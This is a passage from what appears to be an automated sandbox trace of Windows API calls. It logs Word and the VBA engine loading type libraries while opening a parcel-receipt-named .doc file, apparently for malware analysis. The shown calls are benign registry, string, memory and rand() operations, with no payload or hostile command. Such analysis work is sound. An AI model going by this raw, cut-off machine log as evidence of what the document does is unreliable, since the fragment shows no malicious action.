hKey=0x9aa, lpSubKey="409", phkResult=0x286480 | out: phkResult=0x286480*=0x0) returned 0x2 [0016.946] RegOpenKeyW (in: hKey=0x9b2, lpSubKey="win64", phkResult=0x286488 | out: phkResult=0x286488*=0x9ba) returned 0x0 [0016.946] RegCloseKey (hKey=0x9ba) returned 0x0 [0016.946] RegCloseKey (hKey=0x9b2) returned 0x0 [0016.946] _ultow_s (in: _Value=0x0, _Buffer=0x286520, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.946] RegOpenKeyW (in: hKey=0x9aa, lpSubKey="0", phkResult=0x2864f8 | out: phkResult=0x2864f8*=0x9ae) returned 0x0 [0016.946] RegQueryValueW (in: hKey=0x9ae, lpSubKey="win64", lpData=0x286540, lpcbData=0x2864f4 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x2864f4) returned 0x0 [0016.947] wcscpy_s (in: _Destination=0x286870, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0016.947] RegCloseKey (hKey=0x9ae) returned 0x0 [0016.947] RegCloseKey (hKey=0x9aa) returned 0x0 [0016.947] RegCloseKey (hKey=0x9a2) returned 0x0 [0016.947] RegCloseKey (hKey=0x99a) returned 0x0 [0016.947] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x2864f8*=0x0 | out: pptlib=0x2864f8*=0x72e0930) returned 0x0 [0016.947] ITypeLib:RemoteGetDocumentation (in: This=0x72e0930, index=-1, refPtrFlags=0x286518, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xa3ac7d8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xa3ac7d8) returned 0x0 [0016.948] IUnknown:QueryInterface (in: This=0x72e0930, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286308 | out: ppvObject=0x286308*=0x0) returned 0x80004002 [0016.948] ITypeLib:RemoteGetLibAttr (in: This=0x72e0930, ppTLibAttr=0x286300, pDummy=0x10 | out: ppTLibAttr=0x286300, pDummy=0x10) returned 0x0 [0016.948] ITypeLib:RemoteGetDocumentation (in: This=0x72e0930, index=-1, refPtrFlags=0x0, pbstrName=0x2862f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7976d00 | out: pbstrName=0x2862f8*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7976d00*="几߾") returned 0x0 [0016.948] StringFromGUID2 (in: rguid=0x7832160*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x286320, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0016.948] _ultow_s (in: _Value=0x8, _Buffer=0x28626a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0016.948] _ultow_s (in: _Value=0x7, _Buffer=0x28626e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0016.948] _ultow_s (in: _Value=0x0, _Buffer=0x286272, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.948] wcscpy_s (in: _Destination=0x2e14e88, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0016.948] wcscpy_s (in: _Destination=0x2e14e8e, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0016.948] wcscpy_s (in: _Destination=0x2e14eda, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0016.948] wcscpy_s (in: _Destination=0x2e14ee8, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0016.948] wcscpy_s (in: _Destination=0x2e14f5e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0016.948] ITypeLib:LocalReleaseTLibAttr (This=0x72e0930) returned 0x0 [0016.948] wcscpy_s (in: _Destination=0x79d4a10, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0016.948] ITypeLib:RemoteGetDocumentation (in: This=0x72e0930, index=-1, refPtrFlags=0x286418, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0016.948] SysStringLen (param_1="Word") returned 0x4 [0016.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0016.948] SysStringLen (param_1="Word") returned 0x4 [0016.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x2dce158, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0016.948] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0016.948] strcpy_s (in: _Dst=0x286210, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0016.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286210, cbMultiByte=5, lpWideCharStr=0x286060, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0016.948] wcsncpy_s (in: _Destination=0x286010, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0016.948] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0016.948] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x11c) returned 0x79f9fd0 [0016.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x79f9fd0, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0016.948] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f9fd0) [0016.948] wcscpy_s (in: _Destination=0x79beaa8, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0016.948] wcsncpy_s (in: _Destination=0x286050, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0016.948] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0016.948] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x11c) returned 0x79f9fd0 [0016.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x79f9fd0, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0016.949] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f9fd0) [0016.949] wcsncpy_s (in: _Destination=0x286010, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.949] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x285f40, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.949] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0016.949] IUnknown:AddRef (This=0x72e0930) returned 0x3 [0016.949] IUnknown:QueryInterface (in: This=0x72e0930, riid=0x7fef10364b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286438 | out: ppvObject=0x286438*=0x0) returned 0x80004002 [0016.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x286400, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0016.949] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0016.949] IUnknown:Release (This=0x72e0930) returned 0x2 [0016.949] GetModuleFileNameW (in: hModule=0x7fef0ca0000, lpFilename=0x7fef106a9f0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0016.949] QueryPathOfRegTypeLib (in: guid=0x7fef10426a0*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, lpbstrPathName=0x2864a0 | out: lpbstrPathName=0x2864a0) returned 0x0 [0016.952] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x2864f8*=0x0 | out: pptlib=0x2864f8*=0x788e200) returned 0x0 [0016.958] IUnknown:AddRef (This=0x788e200) returned 0x2 [0016.958] ITypeLib:RemoteGetDocumentation (in: This=0x788e200, index=-1, refPtrFlags=0x286518, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x409d00 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x409d00*="鴀@") returned 0x0 [0016.958] IUnknown:QueryInterface (in: This=0x788e200, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286308 | out: ppvObject=0x286308*=0x0) returned 0x80004002 [0016.958] ITypeLib:RemoteGetLibAttr (in: This=0x788e200, ppTLibAttr=0x286300, pDummy=0x10 | out: ppTLibAttr=0x286300, pDummy=0x10) returned 0x0 [0016.958] ITypeLib:RemoteGetDocumentation (in: This=0x788e200, index=-1, refPtrFlags=0x0, pbstrName=0x2862f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8a00b1ca544b | out: pbstrName=0x2862f8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8a00b1ca544b) returned 0x0 [0016.958] StringFromGUID2 (in: rguid=0x7832160*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x286320, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0016.958] _ultow_s (in: _Value=0x4, _Buffer=0x28626a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0016.958] _ultow_s (in: _Value=0x2, _Buffer=0x28626e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0016.958] _ultow_s (in: _Value=0x9, _Buffer=0x286272, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0016.958] wcscpy_s (in: _Destination=0x2e14e88, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0016.958] wcscpy_s (in: _Destination=0x2e14e8e, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0016.958] wcscpy_s (in: _Destination=0x2e14eda, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0016.958] wcscpy_s (in: _Destination=0x2e14ee8, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0016.958] wcscpy_s (in: _Destination=0x2e14f6e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0016.958] ITypeLib:LocalReleaseTLibAttr (This=0x788e200) returned 0x0 [0016.958] wcscpy_s (in: _Destination=0x79e30d8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0016.958] ITypeLib:RemoteGetDocumentation (in: This=0x788e200, index=-1, refPtrFlags=0x286418, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0016.958] SysStringLen (param_1="VBA") returned 0x3 [0016.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0016.958] SysStringLen (param_1="VBA") returned 0x3 [0016.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x7556228, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0016.958] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0016.958] strcpy_s (in: _Dst=0x286210, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0016.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286210, cbMultiByte=4, lpWideCharStr=0x286060, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0016.958] IUnknown:AddRef (This=0x72e0930) returned 0x3 [0016.958] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x286130, pBstrLibName=0x286060 | out: pfName=0x286130*=0, pBstrLibName=0x286060) returned 0x0 [0016.959] IUnknown:Release (This=0x72e0930) returned 0x2 [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc) returned 0x7977340 [0016.959] IMalloc:Free (This=0x7fefe9e5380, pv=0x78322e0) [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x78322e0 [0016.959] IMalloc:Free (This=0x7fefe9e5380, pv=0x7977340) [0016.959] wcsncpy_s (in: _Destination=0x286010, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0016.959] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x122) returned 0x79f9fd0 [0016.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x79f9fd0, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0016.959] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f9fd0) [0016.959] wcscpy_s (in: _Destination=0x72a1718, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0016.959] wcsncpy_s (in: _Destination=0x286050, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0016.959] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x122) returned 0x79f9fd0 [0016.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x79f9fd0, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0016.959] IMalloc:Free (This=0x7fefe9e5380, pv=0x79f9fd0) [0016.959] wcsncpy_s (in: _Destination=0x286010, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.959] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x285f40, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.959] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0016.959] IUnknown:AddRef (This=0x788e200) returned 0x3 [0016.959] IUnknown:QueryInterface (in: This=0x788e200, riid=0x7fef10364b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286438 | out: ppvObject=0x286438*=0x0) returned 0x80004002 [0016.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x286400, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0016.959] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0016.959] IUnknown:Release (This=0x788e200) returned 0x2 [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790dc70 [0016.959] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x790dc70) returned 0x0 [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790dc80 [0016.959] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x790dc80) returned 0x0 [0016.959] VirtualQuery (in: lpAddress=0x2869e0, lpBuffer=0x2869a0, dwLength=0x30 | out: lpBuffer=0x2869a0*(BaseAddress=0x286000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0016.959] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x790dc90 [0016.959] qsort (in: _Base=0x790dc90, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fef0dfdb70 | out: _Base=0x790dc90) [0016.960] IMalloc:Free (This=0x7fefe9e5380, pv=0x790dc90) [0016.960] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x7977340 [0016.960] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc) returned 0x7977480 [0016.960] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x7977480) returned 0xc [0016.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0016.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0016.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0016.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0016.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0016.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0016.960] IMalloc:Free (This=0x7fefe9e5380, pv=0x790dc80) [0016.960] IMalloc:Free (This=0x7fefe9e5380, pv=0x790dc70) [0016.960] CoCreateGuid (in: pguid=0x286ae8 | out: pguid=0x286ae8*(Data1=0x6f855c74, Data2=0x48e4, Data3=0x4df1, Data4=([0]=0x94, [1]=0xb3, [2]=0xe5, [3]=0x4d, [4]=0xc, [5]=0x51, [6]=0x2b, [7]=0x59))) returned 0x0 [0016.960] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x6b0) returned 0x7a75fd0 [0016.961] srand (_Seed=0x5196) [0016.961] rand () returned 2707 [0016.961] rand () returned 5367 [0016.961] rand () returned 3107 [0016.961] rand () returned 25991 [0016.961] rand () returned 22224 [0016.961] rand () returned 7173 [0016.961] rand () returned 3305 [0016.961] rand () returned 5542 [0016.961] rand () returned 21093 [0016.961] rand () returned 7093 [0016.961] rand () returned 29645 [0016.961] rand () returned 30555 [0016.961] rand () returned 4452 [0016.961] rand () returned 15519 [0016.961] rand () returned 22682 [0016.961] rand () returned 20118 [0016.961] rand () returned 26125 [0016.961] rand () returned 28117 [0016.961] rand () returned 31912 [0016.961] rand () returned 27549 [0016.961] rand () returned 25247 [0016.961] rand () returned 12135 [0016.961] rand () returned 31572 [0016.961] rand () returned 27055 [0016.961] rand () returned 11630 [0016.961] rand () returned 26157 [0016.961] rand () returned 24237 [0016.961] rand () returned 16615 [0016.961] rand () returned 23350 [0016.961] rand () returned 7360 [0016.961] rand () returned 27760 [0016.961] rand () returned 12132 [0016.961] rand () returned 17327 [0016.961] rand () returned 21962 [0016.961] rand () returned 16183 [0016.961] rand () returned 15783 [0016.961] rand () returned 1121 [0016.961] rand () returned 21376 [0016.961] rand () returned 32749 [0016.961] rand () returned 25148 [0016.961] rand () returned 9658 [0016.961] rand () returned 30828 [0016.961] rand () returned 21381 [0016.961] rand () returned 2205 [0016.961] rand () returned 5726 [0016.961] rand () returned 9584 [0016.961] rand () returned 20715 [0016.961] rand () returned 32595 [0016.961] rand () returned 28862 [0016.961] rand () returned 14600 [0016.961] rand () returned 4923 [0016.961] rand () returned 4446 [0016.961] rand () returned 16108 [0016.961] rand () returned 5071 [0016.961] rand () returned 15410 [0016.961] rand () returned 20183 [0016.961] rand () returned 12462 [0016.961] rand () returned 17989 [0016.961] rand () returned 31458 [0016.961] rand () returned 18644 [0016.962] rand () returned 30673 [0016.962] rand () returned 19407 [0016.962] rand () returned 27305 [0016.962] rand () returned 17548 